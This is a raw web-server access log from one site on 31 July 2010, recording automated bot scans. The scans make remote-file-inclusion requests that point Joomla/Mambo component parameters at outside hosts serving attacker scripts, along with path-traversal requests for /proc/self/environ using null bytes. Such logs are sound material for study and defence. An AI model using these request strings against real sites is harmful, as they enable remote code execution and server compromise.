89.108.67.164 - - [31/Jul/2010:06:19:20 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:06:19:28 -0700] "GET /logs/access_100423.log////?_SERVER[DOCUMENT_ROOT]=http://outsider-bg.com/_DOC/pid? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.89.16.80 - - [31/Jul/2010:06:19:28 -0700] "GET ////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2875 "-" "libwww-perl/5.805" "www.puaga.com"
62.182.63.25 - - [31/Jul/2010:06:19:28 -0700] "GET ////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.805" "www.puaga.com"
93.89.16.80 - - [31/Jul/2010:06:19:30 -0700] "GET ////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.805" "www.puaga.com"
217.195.185.200 - - [31/Jul/2010:06:20:15 -0700] "GET /logs/access_100531.log//?_PHPLIB[libdir]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
217.195.185.200 - - [31/Jul/2010:06:20:16 -0700] "GET /logs/access_100531.log//?_PHPLIB[libdir]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
93.89.16.80 - - [31/Jul/2010:06:20:33 -0700] "GET /logs/access_100515.log/////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
93.89.16.80 - - [31/Jul/2010:06:20:34 -0700] "GET ////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2875 "-" "libwww-perl/5.805" "www.puaga.com"
93.89.16.80 - - [31/Jul/2010:06:20:34 -0700] "GET /logs/////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
62.182.63.25 - - [31/Jul/2010:06:20:44 -0700] "GET ////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2875 "-" "libwww-perl/5.805" "www.puaga.com"
62.182.63.25 - - [31/Jul/2010:06:20:48 -0700] "GET /logs/access_100512.log/////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
62.182.63.25 - - [31/Jul/2010:06:20:48 -0700] "GET ////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2875 "-" "libwww-perl/5.805" "www.puaga.com"
62.182.63.25 - - [31/Jul/2010:06:20:48 -0700] "GET /logs/////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
91.121.144.61 - - [31/Jul/2010:06:20:55 -0700] "GET /logs/access_100316.log//index.php?option=com_datsogallery&Itemid=com_datsogallery%22+%22Itemid=12=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
93.89.16.80 - - [31/Jul/2010:06:20:57 -0700] "GET /logs/access_100515.log/////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
93.89.16.80 - - [31/Jul/2010:06:20:57 -0700] "GET ////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.805" "www.puaga.com"
93.89.16.80 - - [31/Jul/2010:06:20:58 -0700] "GET /logs/////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
93.89.16.80 - - [31/Jul/2010:06:21:01 -0700] "GET /logs/access_100604.log/////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
93.89.16.80 - - [31/Jul/2010:06:21:09 -0700] "GET ////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2875 "-" "libwww-perl/5.805" "www.puaga.com"
64.202.115.179 - - [31/Jul/2010:06:21:14 -0700] "POST /logs/access_100603.log/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.puaga.com"
64.202.115.179 - - [31/Jul/2010:06:21:14 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.puaga.com"
64.202.115.179 - - [31/Jul/2010:06:21:14 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.puaga.com"
93.89.16.80 - - [31/Jul/2010:06:21:21 -0700] "GET ////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.805" "www.puaga.com"
62.182.63.25 - - [31/Jul/2010:06:21:23 -0700] "GET /logs/access_100512.log/////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
62.182.63.25 - - [31/Jul/2010:06:21:24 -0700] "GET ////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.805" "www.puaga.com"
62.182.63.25 - - [31/Jul/2010:06:21:24 -0700] "GET /logs/////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
93.89.16.80 - - [31/Jul/2010:06:21:26 -0700] "GET /logs/access_100604.log/////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
87.229.45.143 - - [31/Jul/2010:06:21:50 -0700] "GET /logs/access_100316.log//index.php?option=com_datsogallery&Itemid=com_datsogallery%22+%22Itemid=12=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
62.182.63.25 - - [31/Jul/2010:06:21:53 -0700] "GET ////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.805" "www.puaga.com"
62.182.63.25 - - [31/Jul/2010:06:21:54 -0700] "GET ////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2875 "-" "libwww-perl/5.805" "www.puaga.com"
203.147.62.92 - - [31/Jul/2010:06:22:06 -0700] "POST /logs/access_100704.log/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.puaga.com"
203.147.62.92 - - [31/Jul/2010:06:22:07 -0700] "POST /logs/access_100704.log/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.puaga.com"
208.69.56.95 - - [31/Jul/2010:06:22:20 -0700] "GET /logs/access_100709.log%20%20//?_PHPLIB[libdir]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.56.95 - - [31/Jul/2010:06:22:20 -0700] "GET /?_PHPLIB[libdir]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 3640 "-" "Mozilla/5.0" "www.puaga.com"
208.69.56.95 - - [31/Jul/2010:06:22:20 -0700] "GET /logs//?_PHPLIB[libdir]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 25682 "-" "Mozilla/5.0" "www.puaga.com"
216.104.37.106 - - [31/Jul/2010:06:22:42 -0700] "GET ///index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.810" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:06:22:45 -0700] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:06:22:45 -0700] "GET /logs/access_100209.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:06:22:45 -0700] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:06:22:46 -0700] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:06:22:46 -0700] "GET /logs/access_100209.log%20%20//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:06:22:46 -0700] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:06:22:47 -0700] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:06:22:47 -0700] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:06:22:47 -0700] "GET /logs/access_100209.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:06:22:48 -0700] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:06:22:48 -0700] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:06:22:48 -0700] "GET /logs/access_100209.log%20%20//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:06:22:52 -0700] "GET /logs/access_100322.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:06:22:53 -0700] "GET /logs/access_100322.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:06:22:54 -0700] "GET /logs/access_100322.log%20%20//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:06:22:54 -0700] "GET /logs/access_100322.log%20%20//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.229.45.143 - - [31/Jul/2010:06:23:05 -0700] "GET /logs/access_100316.log//index.php?option=com_datsogallery&Itemid=com_datsogallery%22+%22Itemid=12=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
208.69.56.95 - - [31/Jul/2010:06:23:20 -0700] "GET /logs/access_100509.log%20%20//?_PHPLIB[libdir]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.182.63.25 - - [31/Jul/2010:06:23:29 -0700] "GET ////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.805" "www.puaga.com"
62.182.63.25 - - [31/Jul/2010:06:23:40 -0700] "GET /logs/access_100628.log/////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:06:23:47 -0700] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:06:23:47 -0700] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:06:23:47 -0700] "GET /logs/access_100209.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:06:23:48 -0700] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:06:23:48 -0700] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:06:23:48 -0700] "GET /logs/access_100209.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:06:23:56 -0700] "GET /logs/access_100322.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:06:23:57 -0700] "GET /logs/access_100322.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.89.16.80 - - [31/Jul/2010:06:24:05 -0700] "GET ////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2875 "-" "libwww-perl/5.805" "www.puaga.com"
93.89.16.80 - - [31/Jul/2010:06:24:20 -0700] "GET /logs/access_100515.log/////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
93.89.16.80 - - [31/Jul/2010:06:24:21 -0700] "GET ////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2875 "-" "libwww-perl/5.805" "www.puaga.com"
93.89.16.80 - - [31/Jul/2010:06:24:21 -0700] "GET /logs/////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
62.182.63.25 - - [31/Jul/2010:06:24:24 -0700] "GET /logs/access_100628.log/////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
93.89.16.80 - - [31/Jul/2010:06:25:04 -0700] "GET ////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.805" "www.puaga.com"
93.89.16.80 - - [31/Jul/2010:06:25:13 -0700] "GET /logs/access_100515.log/////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
93.89.16.80 - - [31/Jul/2010:06:25:14 -0700] "GET ////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.805" "www.puaga.com"
93.89.16.80 - - [31/Jul/2010:06:25:14 -0700] "GET /logs/////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:06:25:30 -0700] "GET /logs/access_100709.log//?_PHPLIB[libdir]=http://www.net-games.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:06:25:30 -0700] "GET /?_PHPLIB[libdir]=http://www.net-games.it/open.txt??? HTTP/1.1" 200 3640 "-" "Mozilla/5.0" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:06:25:30 -0700] "GET /logs//?_PHPLIB[libdir]=http://www.net-games.it/open.txt??? HTTP/1.1" 200 25682 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:06:25:31 -0700] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:06:25:31 -0700] "GET /logs/access_100209.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:06:25:31 -0700] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:06:25:31 -0700] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:06:25:31 -0700] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:06:25:31 -0700] "GET /logs/access_100209.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:06:25:36 -0700] "GET /logs/access_100322.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:06:25:36 -0700] "GET /logs/access_100322.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:06:25:43 -0700] "GET /logs/access_100509.log//?_PHPLIB[libdir]=http://www.net-games.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.29.171.35 - - [31/Jul/2010:06:26:07 -0700] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
200.29.171.35 - - [31/Jul/2010:06:26:07 -0700] "GET /logs/access_100329.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
200.29.171.35 - - [31/Jul/2010:06:26:07 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
62.182.63.25 - - [31/Jul/2010:06:26:09 -0700] "GET /logs/access_100601.log/////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
62.182.63.25 - - [31/Jul/2010:06:26:09 -0700] "GET ////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2875 "-" "libwww-perl/5.805" "www.puaga.com"
62.182.63.25 - - [31/Jul/2010:06:26:09 -0700] "GET /logs/////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
93.89.16.80 - - [31/Jul/2010:06:26:20 -0700] "GET /logs/access_100707.log/////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
93.89.16.80 - - [31/Jul/2010:06:26:21 -0700] "GET ////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2875 "-" "libwww-perl/5.805" "www.puaga.com"
93.89.16.80 - - [31/Jul/2010:06:26:21 -0700] "GET /logs/////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
93.89.16.80 - - [31/Jul/2010:06:26:27 -0700] "GET /logs/access_100707.log/////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
93.89.16.80 - - [31/Jul/2010:06:26:27 -0700] "GET ////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.805" "www.puaga.com"
93.89.16.80 - - [31/Jul/2010:06:26:28 -0700] "GET /logs/////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
200.29.171.35 - - [31/Jul/2010:06:26:40 -0700] "GET /logs/access_100324.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
62.182.63.25 - - [31/Jul/2010:06:27:28 -0700] "GET /logs/access_100601.log/////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
62.182.63.25 - - [31/Jul/2010:06:27:29 -0700] "GET ////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.805" "www.puaga.com"
62.182.63.25 - - [31/Jul/2010:06:27:29 -0700] "GET /logs/////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
217.65.2.151 - - [31/Jul/2010:06:28:30 -0700] "GET /logs/access_100530.log//index.php?option=com_datsogallery&Itemid=com_datsogallery%22+%22Itemid=12=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.836" "www.puaga.com"
217.65.2.151 - - [31/Jul/2010:06:28:30 -0700] "GET /index.php?option=com_datsogallery&Itemid=com_datsogallery%22+%22Itemid=12=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 200 3640 "-" "libwww-perl/5.836" "www.puaga.com"
217.65.2.151 - - [31/Jul/2010:06:28:31 -0700] "GET /logs//index.php?option=com_datsogallery&Itemid=com_datsogallery%22+%22Itemid=12=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.836" "www.puaga.com"
93.89.16.80 - - [31/Jul/2010:06:28:34 -0700] "GET /logs/access_100708.log/////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
93.89.16.80 - - [31/Jul/2010:06:28:44 -0700] "GET /logs/access_100708.log/////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
62.182.63.25 - - [31/Jul/2010:06:29:15 -0700] "GET /logs/access_100626.log/////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
217.65.2.151 - - [31/Jul/2010:06:29:35 -0700] "GET /logs/access_100502.log//index.php?option=com_datsogallery&Itemid=com_datsogallery%22+%22Itemid=12=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.836" "www.puaga.com"
62.182.63.25 - - [31/Jul/2010:06:30:22 -0700] "GET /logs/access_100626.log/////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
93.89.16.80 - - [31/Jul/2010:06:30:29 -0700] "GET /logs/access_100709.log/////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
93.89.16.80 - - [31/Jul/2010:06:30:30 -0700] "GET ////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2875 "-" "libwww-perl/5.805" "www.puaga.com"
93.89.16.80 - - [31/Jul/2010:06:30:30 -0700] "GET /logs/////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
93.89.16.80 - - [31/Jul/2010:06:31:01 -0700] "GET /logs/access_100625.log/////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
93.89.16.80 - - [31/Jul/2010:06:31:14 -0700] "GET /logs/access_100709.log/////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
